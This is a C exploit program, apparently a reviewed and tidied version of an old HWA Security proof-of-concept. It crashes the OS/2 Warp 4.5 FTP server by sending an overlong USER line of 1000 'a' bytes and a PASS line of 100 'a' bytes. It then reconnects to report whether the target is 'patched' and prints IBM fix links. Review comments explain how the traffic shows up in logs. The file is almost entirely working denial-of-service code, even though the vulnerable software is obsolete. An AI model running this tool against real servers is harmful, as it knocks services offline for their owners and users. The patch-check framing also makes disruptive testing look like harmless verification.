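/* HWA-warpcrash.c */
/* eth0@hwa-security.net */
/*
 * Based on this information:
 *
 * Systems Affected:
 *  - OS/2 Warp 4.5 FTP server V4.0/4.2
 *  - OS/2 Warp 4.5 FTP server V4.3
 *  - Probably other versions of the software as well.
 *
 * THE PROBLEM
 * The FTP server that comes with OS/2 Warp 4.5 TCP/IP can be brought down
 * by a malicious connection attempt.
 */
/* http://www.hwa-security.net */

/*
 * Review notes
 *
 *  - The header names after the nine #include directives were lost when this
 *    listing was extracted; the headers below are the ones the calls in this
 *    file require.
 *  - Traffic produced: one TCP connection carrying "USER " + 1000 'a' bytes
 *    + newline, then "PASS " + 100 'a' bytes + newline.  A command line of
 *    that length should stand out in FTP server logs or at a protocol-aware
 *    proxy that caps command length.
 *  - The final verdict is only a second connect() to the same port.  It shows
 *    whether the port accepts connections afterwards, nothing more: a service
 *    that is restarted automatically, or a port that is filtered, would give
 *    a misleading answer.  The tool therefore refuses to print a verdict when
 *    the first connection never succeeded.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

enum {
    DEFAULT_FTP_PORT = 21,
    USER_FILL_LEN = 1000,   /* number of 'a' bytes sent after "USER " */
    PASS_FILL_LEN = 100     /* number of 'a' bytes sent after "PASS " */
};

/*
 * Resolve a dotted-quad string or a host name to an IPv4 address.
 *
 * Returns the address in network byte order; s_addr is INADDR_NONE when the
 * name is NULL, cannot be resolved, or does not resolve to an IPv4 address.
 */
struct in_addr resolv(char *name)
{
    struct in_addr in;
    in_addr_t literal;
    struct hostent *ent;

    in.s_addr = INADDR_NONE;
    if (name == NULL) {
        return in;
    }

    /* Numeric form first, so no resolver lookup is made for plain addresses. */
    literal = inet_addr(name);
    if (literal != INADDR_NONE) {
        in.s_addr = literal;
        return in;
    }

    ent = gethostbyname(name);
    if (ent == NULL || ent->h_addrtype != AF_INET ||
        ent->h_length != (int)sizeof in.s_addr ||
        ent->h_addr_list[0] == NULL) {
        return in;
    }

    /* memcpy instead of a pointer cast: the resolver buffer is a char array
     * with no alignment guarantee for struct in_addr. */
    memcpy(&in.s_addr, ent->h_addr_list[0], sizeof in.s_addr);
    return in;
}

/*
 * Parse a decimal TCP port in the range 1..65535.
 *
 * Returns 0 and stores the value in *port on success, -1 on malformed or
 * out-of-range input (the original used atoi(), which accepts garbage and
 * silently yields 0).
 */
static int parse_port(const char *text, int *port)
{
    char *end;
    long value;

    if (text == NULL) {
        return -1;
    }
    value = strtol(text, &end, 10);
    if (end == text || *end != '\0' || value < 1 || value > 65535) {
        return -1;
    }
    *port = (int)value;
    return 0;
}

/* Write exactly len bytes to s, retrying on short writes. Returns 0 or -1. */
static int send_all(int s, const char *buf, size_t len)
{
    while (len > 0) {
        ssize_t n = write(s, buf, len);

        if (n <= 0) {
            return -1;
        }
        buf += n;
        len -= (size_t)n;
    }
    return 0;
}

/*
 * Send one command line: the verb, fill_len 'a' bytes written one at a time
 * as in the original listing, then a newline. Returns 0 or -1.
 */
static int send_command(int s, const char *verb, int fill_len)
{
    if (send_all(s, verb, strlen(verb)) < 0) {
        return -1;
    }
    for (int i = 0; i < fill_len; i++) {
        if (send_all(s, "a", 1) < 0) {
            return -1;
        }
    }
    return send_all(s, "\n", 1);
}

/*
 * Check whether host:port still accepts a TCP connection.
 *
 * Returns 0 when the connection was accepted, 1 when it was not, and -1
 * when no check could be made (unresolvable host or socket() failure), in
 * which case no verdict is printed.  The probe socket is always closed.
 */
int testifhostisalive(char *host, int port)
{
    struct sockaddr_in addr;
    int s;
    int rc;

    memset(&addr, 0, sizeof addr);
    addr.sin_family = AF_INET;
    addr.sin_addr = resolv(host);
    addr.sin_port = htons((unsigned short)port);

    if (addr.sin_addr.s_addr == INADDR_NONE) {
        printf("Could not resolve %s, no result.\n", host ? host : "(null)");
        return -1;
    }

    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0) {
        perror("socket");
        return -1;
    }

    rc = connect(s, (struct sockaddr *)&addr, sizeof addr);
    close(s);

    if (rc == 0) {
        printf("System on the other side is patched ===> Good\n");
        return 0;
    }

    printf("System on the other side is NOT patched ===> Bad\n");
    printf("Fix:\n");
    printf(" In case you are using a version prior to 4.3, please contact IBM support for");
    printf(" further assistance.\n");
    printf("If you are using v4.3, you can get the patch at the following URL:\n");
    printf("ftp://ftp.software.ibm.com/ps/products/tcpip/fixes/v4.3os2/ic27721/\n");
    printf("Vendor URL: http://www.ibm.com\n");
    printf("Product URL: http://www.ibm.com/software/os/warp/\n");
    return 1;
}

/*
 * Usage: prog <host> [port]
 *
 * Sends the over-long USER/PASS lines to the given FTP service and then
 * checks whether the port still accepts connections.  Exits with failure
 * status, without printing a verdict, when the arguments are invalid or the
 * first connection cannot be established.
 */
int main(int argc, char *argv[])
{
    struct sockaddr_in addr;
    int s;
    int port = DEFAULT_FTP_PORT;
    char c;
    ssize_t got;

    printf("Systems Affected:\n - OS/2 Warp 4.5 FTP server V4.0/4.2 - OS/2 Warp 4.5 FTP server V4.3 - Probably other versions of the software as well.\n");
    printf("\n");

    if (argc < 2) {
        /* "<host>" was missing from the usage text although argv[1] is
         * the host that gets resolved below. */
        printf("Usage : %s <host> [port]\n", argc > 0 ? argv[0] : "warpcrash");
        return EXIT_FAILURE;
    }
    if (argc >= 3 && parse_port(argv[2], &port) < 0) {
        printf("Invalid port: %s\n", argv[2]);
        return EXIT_FAILURE;
    }

    memset(&addr, 0, sizeof addr);
    addr.sin_family = AF_INET;
    addr.sin_addr = resolv(argv[1]);
    addr.sin_port = htons((unsigned short)port);
    if (addr.sin_addr.s_addr == INADDR_NONE) {
        printf("Could not resolve %s\n", argv[1]);
        return EXIT_FAILURE;
    }

    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0) {
        perror("socket");
        return EXIT_FAILURE;
    }

    /* Without this check an unreachable host would later be reported as
     * "NOT patched" although nothing was ever sent to it. */
    if (connect(s, (struct sockaddr *)&addr, sizeof addr) < 0) {
        perror("connect");
        close(s);
        return EXIT_FAILURE;
    }

    /* NOTE(review): with the default SIGPIPE disposition, a write to a
     * connection the peer has already reset terminates the process before
     * the check below runs; this listing does not change that. */
    if (send_command(s, "USER ", USER_FILL_LEN) < 0 ||
        send_command(s, "PASS ", PASS_FILL_LEN) < 0) {
        printf("Connection dropped while sending.\n");
    } else {
        /* Wait for a single byte of reply (or for the peer to close). */
        got = read(s, &c, 1);
        if (got < 0) {
            perror("read");
        }
    }
    close(s);

    printf("Done sending malicious connection...\n");
    printf("Testing if host was patched or not...\n");
    testifhostisalive(argv[1], port);
    return EXIT_SUCCESS;
}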